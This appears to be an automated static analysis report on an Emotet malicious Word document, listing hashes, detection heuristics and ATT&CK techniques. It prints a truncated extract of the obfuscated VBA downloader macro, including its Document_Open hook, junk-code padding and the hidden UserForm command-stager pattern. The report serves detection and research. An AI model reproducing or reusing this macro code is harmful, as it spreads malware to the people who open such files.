Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 3599cbdbe9bf9bc3…

MALICIOUS

Office (OLE)

225.7 KB Created: 2020-08-27 08:39:00 Authoring application: Microsoft Office Word First seen: 2020-09-15
MD5: 4e257ff6f4b7a0c1889d3023d459be43 SHA-1: d053dce8762fc7215e8adc521bb18648dd2acd39 SHA-256: 3599cbdbe9bf9bc3a8a824fe0b4df98018df67b9c07cbaafa6331c4fdb68208b
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros with a Document_Open auto-execution routine, indicative of a malicious document. Critical heuristics indicate a hidden UserForm command stager, a common Emotet technique for downloading and executing further payloads. The ClamAV signature also explicitly names Emotet.

Heuristics 7

  • ClamAV: Doc.Downloader.EmotetRed02226-9938639-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.EmotetRed02226-9938639-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9239 bytes
SHA-256: 8b93416e0d4e8ed1301e23bd14a33edd647c51f7b1f5635959c62c35ce6d403a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ogwj7dz9yz6"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Cpylr5czo_dt.Nwlvq1qunhvxe
End Sub


Attribute VB_Name = "Cpylr5czo_dt"
Attribute VB_Base = "0{4AC8E6A5-B599-413A-85D8-81A8FB482D1B}{3E74C5AA-5594-4293-A48F-9EFFF573E412}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Nwlvq1qunhvxe()
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Gilcp3gswl3sfo0pqz = 100
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Zuj2d0co751s5lkt = ChrW(Gilcp3gswl3sfo0pqz + (xw + 5 + jwb + 10))
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Khwqtqoeb5tlzjq0r4 = "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())i(hsv 32(()hq gq721g()))) hsu0())nm(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())gm(hsv 32(()hq gq721g()))) hsu0())t(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())" + Zuj2d0co751s5lkt + "(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0()):(hsv 32(()hq gq721g()))) hsu0())w(hsv 32(()hq gq721g()))) hsu0())in(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())3(hsv 32(()hq gq721g()))) hsu0())2(hsv 32(()hq gq721g()))) hsu0())_(hsv 32(()hq gq721g()))) hsu0())" + Cpylr5czo_dt.Gsm427kxyw82m41i + "(hsv 32(()hq gq721g()))) hsu0())ro(hsv 32(()hq gq721g()))) hsu0())(hsv 32(()hq gq721g()))) hsu0())ce(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())s(hsv 32(()hq gq721g()))) hsu0())"
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
G24lp96fyuoy08tp7 = Lmwxjmutqqp4ujh0(Khwqtqoeb5tlzjq0r4)
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
Lu7gu84qmnx3w1uil = Cpylr5czo_dt.Lrwalh7cpnl3fd9.ControlTipText
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS)))
         wwwwww = (MpBQ + Round(pxer0) / 70 / Hex(1614 - CLng(40679596)) - 9 + CBool(efCF1u1)) * BgJh - Fgwld45m6
S3tc33mphau5 = O19w4vwk0k_ofw + (G24lp96fyuoy08tp7 + Zuj2d0co751s5lkt + Cpylr5czo_dt.Bq9sqz9e483y.ControlTipText + Lu7gu84qmnx3w1uil)
   On Error Resume Next
         wwwwww = Zyrc / Sin(ULZZ9) * BmtF * pLiA30s + jazi + PhzY / TpZa1L / 830 * (DdY / CLng(zTHb2251X) - AWdYTT5J0 / Oct(812 + Sqr(hxS
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.